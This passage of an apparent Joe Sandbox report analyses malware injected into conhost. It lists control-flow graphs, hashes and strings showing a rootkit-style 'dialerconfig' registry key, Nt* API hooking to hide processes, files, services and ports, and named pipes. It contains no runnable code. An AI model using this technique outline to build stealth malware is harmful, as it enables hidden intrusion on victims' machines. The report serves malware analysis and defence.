                                                                  • Part of subcall function 00000216ACFD1650: RegOpenKeyExW.ADVAPI32 ref: 00000216ACFD1868
                                                                  • Part of subcall function 00000216ACFD1650: RegCloseKey.ADVAPI32 ref: 00000216ACFD1883
                                                                  • Part of subcall function 00000216ACFD1650: RegOpenKeyExW.ADVAPI32 ref: 00000216ACFD18A3
                                                                  • Part of subcall function 00000216ACFD1650: RegCloseKey.ADVAPI32 ref: 00000216ACFD18BE
                                                                  • Part of subcall function 00000216ACFD1650: RegCloseKey.ADVAPI32 ref: 00000216ACFD18C8
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                • String ID:
                                                                • API String ID: 1534210851-0
                                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                • Instruction ID: 7c38ec1f17aced3197e9535f2529ffacc96dd5552352892eb493a53143d74361
                                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                • Instruction Fuzzy Hash: BF31E33620060999FF529F7EE54D3DE13EFAF64BE9F04D021DE09A7699DF14C4509250

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2281866973.00000216AAA70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000216AAA70000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216aaa70000_conhost.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                • Instruction ID: 3143d5f18772142025f3364728f2f763df1437254cc6a4f9971328c286eb9dcc
                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                • Instruction Fuzzy Hash: 4861223270125087EA68CF15D46C7AEB3D1FF64B94F448022DF1A97B89DB3AE856C700

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 203 216acfd2cdc-216acfd2d55 call 216acfeecc0 206 216acfd3090-216acfd30b3 203->206 207 216acfd2d5b-216acfd2d61 203->207 207->206 208 216acfd2d67-216acfd2d6a 207->208 208->206 209 216acfd2d70-216acfd2d73 208->209 209->206 210 216acfd2d79-216acfd2d89 GetModuleHandleA 209->210 211 216acfd2d8b-216acfd2d9b call 216acfe3090 210->211 212 216acfd2d9d 210->212 214 216acfd2da0-216acfd2dbe 211->214 212->214 214->206 217 216acfd2dc4-216acfd2de3 StrCmpNIW 214->217 217->206 218 216acfd2de9-216acfd2ded 217->218 218->206 219 216acfd2df3-216acfd2dfd 218->219 219->206 220 216acfd2e03-216acfd2e0a 219->220 220->206 221 216acfd2e10-216acfd2e23 220->221 222 216acfd2e33 221->222 223 216acfd2e25-216acfd2e31 221->223 224 216acfd2e36-216acfd2e3a 222->224 223->224 225 216acfd2e4a 224->225 226 216acfd2e3c-216acfd2e48 224->226 227 216acfd2e4d-216acfd2e57 225->227 226->227 228 216acfd2f4d-216acfd2f51 227->228 229 216acfd2e5d-216acfd2e60 227->229 232 216acfd3082-216acfd308a 228->232 233 216acfd2f57-216acfd2f5a 228->233 230 216acfd2e72-216acfd2e7c 229->230 231 216acfd2e62-216acfd2e6f call 216acfd1a14 229->231 237 216acfd2e7e-216acfd2e8b 230->237 238 216acfd2eb0-216acfd2eba 230->238 231->230 232->206 232->221 234 216acfd2f6b-216acfd2f75 233->234 235 216acfd2f5c-216acfd2f68 call 216acfd1a14 233->235 240 216acfd2fa5-216acfd2fa8 234->240 241 216acfd2f77-216acfd2f84 234->241 235->234 237->238 243 216acfd2e8d-216acfd2e9a 237->243 244 216acfd2eea-216acfd2eed 238->244 245 216acfd2ebc-216acfd2ec9 238->245 250 216acfd2fb5-216acfd2fc2 lstrlenW 240->250 251 216acfd2faa-216acfd2fb3 call 216acfd1d28 240->251 241->240 249 216acfd2f86-216acfd2f93 241->249 252 216acfd2e9d-216acfd2ea3 243->252 247 216acfd2eef-216acfd2ef9 call 216acfd1d28 244->247 248 216acfd2efb-216acfd2f08 lstrlenW 244->248 245->244 253 216acfd2ecb-216acfd2ed8 245->253 247->248 259 216acfd2f43-216acfd2f48 247->259 255 216acfd2f2b-216acfd2f3d call 216acfd3930 248->255 256 216acfd2f0a-216acfd2f14 248->256 257 216acfd2f96-216acfd2f9c 249->257 261 216acfd2fe5-216acfd2fef call 216acfd3930 250->261 262 216acfd2fc4-216acfd2fce 250->262 251->250 269 216acfd2ffa-216acfd3005 251->269 252->259 260 216acfd2ea9-216acfd2eae 252->260 263 216acfd2edb-216acfd2ee1 253->263 255->259 272 216acfd2ff2-216acfd2ff4 255->272 256->255 267 216acfd2f16-216acfd2f29 call 216acfd1554 256->267 268 216acfd2f9e-216acfd2fa3 257->268 257->269 259->272 260->238 260->252 261->272 262->261 273 216acfd2fd0-216acfd2fe3 call 216acfd1554 262->273 263->259 264 216acfd2ee3-216acfd2ee8 263->264 264->244 264->263 267->255 267->259 268->240 268->257 275 216acfd307c-216acfd3080 269->275 276 216acfd3007-216acfd300b 269->276 272->232 272->269 273->261 273->269 275->232 281 216acfd3013-216acfd302d call 216acfd86a0 276->281 282 216acfd300d-216acfd3011 276->282 284 216acfd3030-216acfd3033 281->284 282->281 282->284 287 216acfd3035-216acfd3053 call 216acfd86a0 284->287 288 216acfd3056-216acfd3059 284->288 287->288 288->275 289 216acfd305b-216acfd3079 call 216acfd86a0 288->289 289->275
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                • API String ID: 2119608203-3850299575
                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                • Instruction ID: 7b83f6cded1a0b97e65bb081b4a7369bf9a664cd38c62376474f0ff6fb761171
                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                • Instruction Fuzzy Hash: A3B1AC72210A5982EBA69F2DD44C7ED63EAFF64B8CF145016EE0963798DB35CD84C380

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 3140674995-0
                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                • Instruction ID: ea88aeee58807cd2dffca6095022d8c178404506ca9e8d55a047491463bc1268
                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                • Instruction Fuzzy Hash: AE317073204B84CAEB608F68E8487EE73A9FF95748F44442ADA4D57B98EF38C548C710
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 1239891234-0
                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                • Instruction ID: e957e0b95d64842829e576aa25b3bba470a7d7fd7fbd4d9377043b786125c23f
                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                • Instruction Fuzzy Hash: 3C318E32214F8486EB20CF28E8483DE73A9FF99758F540116EA9D57BA8DF38C549CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                • String ID:
                                                                • API String ID: 1443284424-0
                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                • Instruction ID: f535d79f3937ace7f2499d766dffacdadf870ce0f82d93d60ab47a60846d957f
                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                • Instruction Fuzzy Hash: B9E1F032B04A849AE701CF68D48C3DD7BB6FF56788F548116EF4A67B99DA38C51AC700

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                • API String ID: 106492572-2879589442
                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                • Instruction ID: 15a28eb50da5c8d6157e13b806637574bfe47b621e694ecdc3de697b667383f8
                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                • Instruction Fuzzy Hash: 94711836310E588AEB109F69E84C6DD27BAFFA5B9CF045111DE4D63A29DE38C549C700

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                • String ID: d
                                                                • API String ID: 2005889112-2564639436
                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                • Instruction ID: b08a4d970c8199a8e19d08164504a78fe802a3e2112e4f3c075990bc11c0aeb6
                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                • Instruction Fuzzy Hash: 74515A72614B4896EB14CF6AE54C39EB3AAFB9AB94F088128DE4917B14DF3CC059C740

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                • API String ID: 4175298099-1975688563
                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                • Instruction ID: 52e4b070a27c08695c2c76d6a80402335e4283076ee9e3f8bc51578ccf05c1d3
                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                • Instruction Fuzzy Hash: DC31C7B4200A5EE0EB4ADF6CE85D6DC336BBF75348F82541395193316A9E388A4DC390

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                • API String ID: 2171963597-1373409510
                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                • Instruction ID: c2740dff10df5738d9cc888abaaedb395c281a98eeb5c5ed4f0ea1d163617abd
                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                • Instruction Fuzzy Hash: CB213E35614B4482E710CB29F44C3AE77A6FB9ABA9F544215DE5913AA8CF3CC549CB01

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                • String ID: d
                                                                • API String ID: 3743429067-2564639436
                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                • Instruction ID: 81fdf50ea7b20d696ee92110824eeedc3b1d0f1569cc297a8d2f1bdd8dac6fc6
                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                • Instruction Fuzzy Hash: 1641C233604B849BEB618F59E44C3DEB7AAFB99798F008129DB8917B44DF38C165CB00

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 318 216aaa769f0-216aaa769f6 319 216aaa769f8-216aaa769fb 318->319 320 216aaa76a31-216aaa76a3b 318->320 321 216aaa769fd-216aaa76a00 319->321 322 216aaa76a25-216aaa76a64 call 216aaa770a0 319->322 323 216aaa76b58-216aaa76b6d 320->323 324 216aaa76a18 __scrt_dllmain_crt_thread_attach 321->324 325 216aaa76a02-216aaa76a05 321->325 338 216aaa76a6a-216aaa76a7f call 216aaa76f34 322->338 339 216aaa76b32 322->339 326 216aaa76b7c-216aaa76b96 call 216aaa76f34 323->326 327 216aaa76b6f 323->327 333 216aaa76a1d-216aaa76a24 324->333 329 216aaa76a07-216aaa76a10 325->329 330 216aaa76a11-216aaa76a16 call 216aaa76fe4 325->330 341 216aaa76b98-216aaa76bcd call 216aaa7705c call 216aaa76efc call 216aaa773f8 call 216aaa77210 call 216aaa77234 call 216aaa7708c 326->341 342 216aaa76bcf-216aaa76c00 call 216aaa77270 326->342 331 216aaa76b71-216aaa76b7b 327->331 330->333 350 216aaa76b4a-216aaa76b57 call 216aaa77270 338->350 351 216aaa76a85-216aaa76a96 call 216aaa76fa4 338->351 343 216aaa76b34-216aaa76b49 339->343 341->331 352 216aaa76c02-216aaa76c08 342->352 353 216aaa76c11-216aaa76c17 342->353 350->323 371 216aaa76a98-216aaa76abc call 216aaa773bc call 216aaa76eec call 216aaa76f18 call 216aaa790dc 351->371 372 216aaa76ae7-216aaa76af1 call 216aaa77210 351->372 352->353 357 216aaa76c0a-216aaa76c0c 352->357 358 216aaa76c19-216aaa76c23 353->358 359 216aaa76c5e-216aaa76c74 call 216aaa72858 353->359 365 216aaa76cff-216aaa76d0c 357->365 366 216aaa76c25-216aaa76c2d 358->366 367 216aaa76c2f-216aaa76c3d call 216aaa82758 358->367 379 216aaa76cac-216aaa76cae 359->379 380 216aaa76c76-216aaa76c78 359->380 368 216aaa76c43-216aaa76c58 call 216aaa769f0 366->368 367->368 384 216aaa76cf5-216aaa76cfd 367->384 368->359 368->384 371->372 420 216aaa76abe-216aaa76ac5 __scrt_dllmain_after_initialize_c 371->420 372->339 391 216aaa76af3-216aaa76aff call 216aaa77260 372->391 381 216aaa76cb5-216aaa76cca call 216aaa769f0 379->381 382 216aaa76cb0-216aaa76cb3 379->382 380->379 388 216aaa76c7a-216aaa76c9c call 216aaa72858 call 216aaa76b58 380->388 381->384 400 216aaa76ccc-216aaa76cd6 381->400 382->381 382->384 384->365 388->379 415 216aaa76c9e-216aaa76ca6 call 216aaa82758 388->415 408 216aaa76b25-216aaa76b30 391->408 409 216aaa76b01-216aaa76b0b call 216aaa77178 391->409 405 216aaa76cd8-216aaa76cdf 400->405 406 216aaa76ce1-216aaa76cf1 call 216aaa82758 400->406 405->384 406->384 408->343 409->408 421 216aaa76b0d-216aaa76b1b 409->421 415->379 420->372 422 216aaa76ac7-216aaa76ae4 call 216aaa79078 420->422 421->408 422->372
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2281866973.00000216AAA70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000216AAA70000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216aaa70000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                • String ID:
                                                                • API String ID: 190073905-0
                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction ID: 276578507945c33ef4afd4b8fa06b4e4d34558ccef6c99f6ca09a8f39995bc43
                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction Fuzzy Hash: CE819271A1028146FA559B26987D3EFA6E0EFB9780F4440279F1DF379ADB3BC8458700

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 425 216acfd75f0-216acfd75f6 426 216acfd7631-216acfd763b 425->426 427 216acfd75f8-216acfd75fb 425->427 428 216acfd7758-216acfd776d 426->428 429 216acfd7625-216acfd7664 call 216acfd7ca0 427->429 430 216acfd75fd-216acfd7600 427->430 434 216acfd776f 428->434 435 216acfd777c-216acfd7796 call 216acfd7b34 428->435 445 216acfd7732 429->445 446 216acfd766a-216acfd767f call 216acfd7b34 429->446 432 216acfd7602-216acfd7605 430->432 433 216acfd7618 __scrt_dllmain_crt_thread_attach 430->433 437 216acfd7611-216acfd7616 call 216acfd7be4 432->437 438 216acfd7607-216acfd7610 432->438 441 216acfd761d-216acfd7624 433->441 439 216acfd7771-216acfd777b 434->439 448 216acfd77cf-216acfd7800 call 216acfd7e70 435->448 449 216acfd7798-216acfd77cd call 216acfd7c5c call 216acfd7afc call 216acfd7ff8 call 216acfd7e10 call 216acfd7e34 call 216acfd7c8c 435->449 437->441 451 216acfd7734-216acfd7749 445->451 458 216acfd7685-216acfd7696 call 216acfd7ba4 446->458 459 216acfd774a-216acfd7757 call 216acfd7e70 446->459 460 216acfd7802-216acfd7808 448->460 461 216acfd7811-216acfd7817 448->461 449->439 478 216acfd76e7-216acfd76f1 call 216acfd7e10 458->478 479 216acfd7698-216acfd76bc call 216acfd7fbc call 216acfd7aec call 216acfd7b18 call 216acfd9cdc 458->479 459->428 460->461 462 216acfd780a-216acfd780c 460->462 463 216acfd785e-216acfd7874 call 216acfd3458 461->463 464 216acfd7819-216acfd7823 461->464 468 216acfd78ff-216acfd790c 462->468 486 216acfd78ac-216acfd78ae 463->486 487 216acfd7876-216acfd7878 463->487 469 216acfd7825-216acfd782d 464->469 470 216acfd782f-216acfd783d call 216acfe3358 464->470 475 216acfd7843-216acfd7858 call 216acfd75f0 469->475 470->475 490 216acfd78f5-216acfd78fd 470->490 475->463 475->490 478->445 499 216acfd76f3-216acfd76ff call 216acfd7e60 478->499 479->478 528 216acfd76be-216acfd76c5 __scrt_dllmain_after_initialize_c 479->528 488 216acfd78b5-216acfd78ca call 216acfd75f0 486->488 489 216acfd78b0-216acfd78b3 486->489 487->486 495 216acfd787a-216acfd789c call 216acfd3458 call 216acfd7758 487->495 488->490 509 216acfd78cc-216acfd78d6 488->509 489->488 489->490 490->468 495->486 520 216acfd789e-216acfd78a6 call 216acfe3358 495->520 517 216acfd7725-216acfd7730 499->517 518 216acfd7701-216acfd770b call 216acfd7d78 499->518 514 216acfd78e1-216acfd78f1 call 216acfe3358 509->514 515 216acfd78d8-216acfd78df 509->515 514->490 515->490 517->451 518->517 527 216acfd770d-216acfd771b 518->527 520->486 527->517 528->478 529 216acfd76c7-216acfd76e4 call 216acfd9c78 528->529 529->478
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                • String ID:
                                                                • API String ID: 190073905-0
                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction ID: a88ed261009cd0c0d1d120b268fada32e84b8b10411122a61b59b701fb18cc04
                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction Fuzzy Hash: D981F23170434DC6F756AB2D984D3ED62DBAF76B88F584417A9047F79EEA38C8458700

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 532 216acfd9804-216acfd9842 533 216acfd9933 532->533 534 216acfd9848-216acfd984b 532->534 535 216acfd9935-216acfd9951 533->535 534->535 536 216acfd9851 534->536 537 216acfd9854 536->537 538 216acfd992b 537->538 539 216acfd985a-216acfd9869 537->539 538->533 540 216acfd986b-216acfd986e 539->540 541 216acfd9876-216acfd9895 LoadLibraryExW 539->541 542 216acfd9874 540->542 543 216acfd990d-216acfd991c call 216acfe3090 540->543 544 216acfd98ed-216acfd9902 541->544 545 216acfd9897-216acfd98a0 call 216acfe3080 541->545 548 216acfd98e1-216acfd98e8 542->548 543->538 554 216acfd991e-216acfd9929 543->554 544->543 546 216acfd9904-216acfd9907 FreeLibrary 544->546 552 216acfd98a2-216acfd98b7 call 216acfdad28 545->552 553 216acfd98cf-216acfd98d9 545->553 546->543 548->537 552->553 557 216acfd98b9-216acfd98cd LoadLibraryExW 552->557 553->548 554->535 557->544 557->553
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                • String ID: api-ms-
                                                                • API String ID: 2559590344-2084034818
                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                • Instruction ID: a37728357998e0ae6009f9c9f603858b93d39a563650bdb3060cd7f93116d6ec
                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                • Instruction Fuzzy Hash: 4A31C531302A48A1FE13DB4AA40C7DD63DDBF69BA8F594525ED2D27394EF38C1858300

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                • String ID: CONOUT$
                                                                • API String ID: 3230265001-3130406586
                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                • Instruction ID: 769c50c567f3dcfdc6fb43bd0eeebf71e1f2a38bd04ecdfdeaef1efea0291703
                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                • Instruction Fuzzy Hash: 29119D31714B4486E7508B1EE84C39D62A9FFAAFE4F044228EE5D97BA4CF3CC9188740

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 581 216acfd5c10-216acfd5c37 582 216acfd5c4b-216acfd5c56 GetCurrentThreadId 581->582 583 216acfd5c39-216acfd5c48 581->583 584 216acfd5c62-216acfd5c69 582->584 585 216acfd5c58-216acfd5c5d 582->585 583->582 587 216acfd5c7b-216acfd5c8f 584->587 588 216acfd5c6b-216acfd5c76 call 216acfd5a40 584->588 586 216acfd608f-216acfd60a6 call 216acfd7a20 585->586 591 216acfd5c9e-216acfd5ca4 587->591 588->586 594 216acfd5d75-216acfd5d96 591->594 595 216acfd5caa-216acfd5cb3 591->595 599 216acfd5eff-216acfd5f10 call 216acfd759f 594->599 600 216acfd5d9c-216acfd5dbc GetThreadContext 594->600 597 216acfd5cb5-216acfd5cf8 call 216acfd86a0 595->597 598 216acfd5cfa-216acfd5d6d call 216acfd45f0 call 216acfd4590 call 216acfd4550 595->598 610 216acfd5d70 597->610 598->610 614 216acfd5f15-216acfd5f1b 599->614 603 216acfd5dc2-216acfd5de3 600->603 604 216acfd5efa 600->604 603->604 613 216acfd5de9-216acfd5df2 603->613 604->599 610->591 616 216acfd5e72-216acfd5e83 613->616 617 216acfd5df4-216acfd5e05 613->617 618 216acfd5fde-216acfd5fee 614->618 619 216acfd5f21-216acfd5f78 VirtualProtect FlushInstructionCache 614->619 627 216acfd5ef5 616->627 628 216acfd5e85-216acfd5ea3 616->628 623 216acfd5e6d 617->623 624 216acfd5e07-216acfd5e1c 617->624 621 216acfd5ffe-216acfd600a call 216acfd4ed0 618->621 622 216acfd5ff0-216acfd5ff7 618->622 625 216acfd5f7a-216acfd5f84 619->625 626 216acfd5fa9-216acfd5fd9 call 216acfd798c 619->626 643 216acfd600f-216acfd6015 621->643 622->621 631 216acfd5ff9 call 216acfd44c0 622->631 623->627 624->623 633 216acfd5e1e-216acfd5e68 call 216acfd3a50 SetThreadContext 624->633 625->626 634 216acfd5f86-216acfd5fa1 call 216acfd4470 625->634 626->614 628->627 635 216acfd5ea5-216acfd5ef0 call 216acfd39e0 call 216acfd75bd 628->635 631->621 633->623 634->626 635->627 647 216acfd6057-216acfd6075 643->647 648 216acfd6017-216acfd6055 ResumeThread call 216acfd798c 643->648 650 216acfd6077-216acfd6086 647->650 651 216acfd6089 647->651 648->643 650->651 651->586
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Thread$Current$Context
                                                                • String ID:
                                                                • API String ID: 1666949209-0
                                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                • Instruction ID: 2038f771110cf11e17af6d2d546607527019b2993d83766b733941d307145f9c
                                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                • Instruction Fuzzy Hash: C6D18D76209B8882DA75DB19E49839E77E5FBD8F88F100216EA8D57BA5DF3CC541CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2283543838.00000216ACFD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216ACFD0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_216acfd0000_conhost.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocFree
                                                                • String ID: dialer
                                                                • API String ID: 756756679-3528709123
                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                • Instruction ID: 5ede828a51e978016911ebdf5eb8e7b76e50c3a9d2bf6c4b122495befe7fd08f
